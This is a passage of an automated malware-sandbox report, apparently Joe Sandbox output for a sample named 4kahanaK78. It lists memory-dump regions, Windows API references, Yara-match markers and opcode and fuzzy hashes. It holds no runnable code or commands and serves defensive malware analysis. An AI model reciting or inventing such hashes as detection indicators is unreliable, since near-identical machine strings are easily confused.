                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                    • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                    • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                    • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B53F48,?,?,00000008,?,?,04B5AB25,00000000), ref: 04B5417A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction ID: 851bf4821145136d6815e672a2d621058b53c36e9e3f86bff6807aee8922e64a
                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction Fuzzy Hash: 84B13F35610605DFDB15CF28C486B65BBE0FF45365F298698E899CF2B2C336E992CB40
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                    • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                    • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                    • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction ID: 2a02ed98e1fb0d2dcd136e8a3c24fc4c13b555c0caf67f709e2798379d18ada7
                                    • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction Fuzzy Hash: 4B41A2B5804218AFDF20DF79CC88BAAFBB8EB45304F5442D9E85DD3210DA35AE858F50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction ID: 5ef8e782818ac5c356667e56c32e051b370d413b7f744af6f0ed5b3d29dfc074
                                    • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                    • Instruction Fuzzy Hash: 5141B6B1C04618AFDB24DF69CC89AEABBB8EF85304F1442DEE41DD3211DA359E858F14
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00409955,04B497B6), ref: 04B49BB5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                    • Instruction Fuzzy Hash:
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: No+
                                    • API String ID: 0-528625556
                                    • Opcode ID: 4b3da43e576934ce25d9d671c6fc8a4cdc5e0f12d0a67e1bd793866cabdbd758
                                    • Instruction ID: 3ede7bdfd30981235f4c42f8339a272393ad896b350bc14e06d0a5b942d58be6
                                    • Opcode Fuzzy Hash: 4b3da43e576934ce25d9d671c6fc8a4cdc5e0f12d0a67e1bd793866cabdbd758
                                    • Instruction Fuzzy Hash: EB7149B3F182145FF308AE29DC8577676CAEB94320F2B453DE689C7780E9795C058386
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction ID: 1b20faf3ed2e5a3898006549f2bdd42645f964e378022ed5f9256f9bdd23f1cc
                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction Fuzzy Hash: 8B5148716006895AFB3C9E2F86A97BE679B9F02304F080419D587D7281EB15FB47D352
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction ID: 4d038a623b67b2d4d8bb106c9519eaac79460430972acfb6e378cfe107750d19
                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction Fuzzy Hash: 0751687134078896EB38CA2FC895BBE779BAB02308F08442DD947DB280E715BB45F356
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction ID: b9f3cf54a43b37b6f63110615f6ebe7ae02d2151f078c9cebda4c17c6b13ec97
                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction Fuzzy Hash: 05515B7070064866EF799E6C88D47BE77EEDBC2308F0409DED48ADB281E625F944B752
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction ID: 27f77c7acea2fc84f8a590b6e4e10ead9a2a83a80aada22a30ccf30e84eacb9e
                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction Fuzzy Hash: 4D516C30704648A6EF389EAC88947BE679DEBD2708F0805DED482D72C1D661F946F352
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                    • Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                    • Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 3;@Q
                                    • API String ID: 0-133278789
                                    • Opcode ID: fb27fab725d3ad7241824fe616926b19df49fd4099ea8a197e08df3e4784e216
                                    • Instruction ID: 85834ad096e75f899e44f22105cad6105abcbab53119e360884b91050844b707
                                    • Opcode Fuzzy Hash: fb27fab725d3ad7241824fe616926b19df49fd4099ea8a197e08df3e4784e216
                                    • Instruction Fuzzy Hash: B55159E3B152141BF308593EDDD9727A68AE7D4324F1A823DEE459B7C8ECBD49064184
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction ID: 98ac959fbcbf31f9aa391364da723e162a93da40453b3f395bdb6a7f0ce9ff37
                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction Fuzzy Hash: 75322131E28F414DD7639634CC22336A299AFB73C5F95D737E81AB5EA6EB28D1834104
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                    • Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4331efa3e4cd9e9035b55000437494ff58eddc627fb351529adcc15277436f73
                                    • Instruction ID: 13c3743454468a09cf5ce07b4316404b8bc2c630a243100432177bc49d667746
                                    • Opcode Fuzzy Hash: 4331efa3e4cd9e9035b55000437494ff58eddc627fb351529adcc15277436f73
                                    • Instruction Fuzzy Hash: 7BB1AEB3F505250BF3484878CD693B666829B94324F2F423C8F5EAB7C6D8BE5D0A52C4
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction ID: c7031f03101d0202a692070b25accc8ab3173f42828be11aaf8418cf64763123
                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                    • Instruction Fuzzy Hash: B6B17D31210648EFD754CF18C886B647BA2FF05364F298658ED99CF2B1C739EA82CB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0388ea03d020f975314caf6ad8e62dfec7beba9ef163f67e1b0eaba47815d6c4
                                    • Instruction ID: 8b7691f96fa5cb7c1330e53ac4b07854f9196ceab4f3dfff177c07b51dae8ebe
                                    • Opcode Fuzzy Hash: 0388ea03d020f975314caf6ad8e62dfec7beba9ef163f67e1b0eaba47815d6c4
                                    • Instruction Fuzzy Hash: A851C0B240D390AFD306AB24D865669BFF4EF56310F0A896EE5C587292D3744404DBA7
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                    • Instruction ID: b9d8271b3f9c33d4557c4a4576e3425dfb6988ab9ea1f00b6dd8598141c681a7
                                    • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                    • Instruction Fuzzy Hash: 3151BCB1E103058FEB25DF5AD9817AABBF2FB48314F54852AC801EB354D339AA11CB65
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a9f000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e2aa5dabd5d47d8fbba074b59769cbd78824ab37917dcf6f42da845136541547
                                    • Instruction ID: 2ffbae9fcaf7036f7e84e97a073718a321f5944ccc2814577683e6b45ab4841b
                                    • Opcode Fuzzy Hash: e2aa5dabd5d47d8fbba074b59769cbd78824ab37917dcf6f42da845136541547
                                    • Instruction Fuzzy Hash: B13190B241C210EFE715AF19D8455AAFBE9FF98720F268C2DF5C583610E73149409B97
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction ID: 5718e3f45fb01b4b9af8bb9843be005a69742a386172f406e5f7262e98beb966
                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction Fuzzy Hash: BC21B373F204394B7B0CC57ECC522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction ID: 53a9b4596741b4d703b3dee2c66b20d577f2960826688a38eeab8e35c5903ed5
                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction Fuzzy Hash: 2321B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
                                    • Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
                                    • Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306653109.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_819000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 018ba101057622a82a76edb0a296d61167f108d7a43d3e8a446acfe5abe04db2
                                    • Instruction ID: 73be84f0a593e34bcc2d27a760d4a4752033f2e1fd5c414317f5686b9ea08071
                                    • Opcode Fuzzy Hash: 018ba101057622a82a76edb0a296d61167f108d7a43d3e8a446acfe5abe04db2
                                    • Instruction Fuzzy Hash: 3F3127F3E182101BF34C9528EC96727B2C6ABD4320F1E873E9E5AD33C1E8ADAD054195
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction ID: f0098194cef53a99a5c501967b9cf24841fb35c31397b7ca8774a3519f6b4b04
                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction Fuzzy Hash: 1011A763F30C255B675C81698C1327AA1D2EBD815074F433AD826E7284E8A4EE13D290
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction ID: e73887866517eae7714d013718d8a8bd1de4ec71e4a0f3fa3c223a6bd36a49e9
                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction Fuzzy Hash: 3911A723F30C255B675C81698C1727AA1D2DBDC14030F433AD826E7284E894DE13D290
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
                                    • Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
                                    • Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 26b9b63659b74d42d569804443eca3166b2110a897851afa81f8b7592a678c22
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 9A1104F72401A243D6048A2FC8F56FBE797EBC632172C426AD0428BB58E333F3559600
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 7a73fe8d35e3d71c5c24f5c0b821b3dd9abe8ae56d6465770b908d97031b84e3
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: DC1108772C0151439695CB2DDDB41BAA796EBCD32072C46EAD0414F75AD122F544B600
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
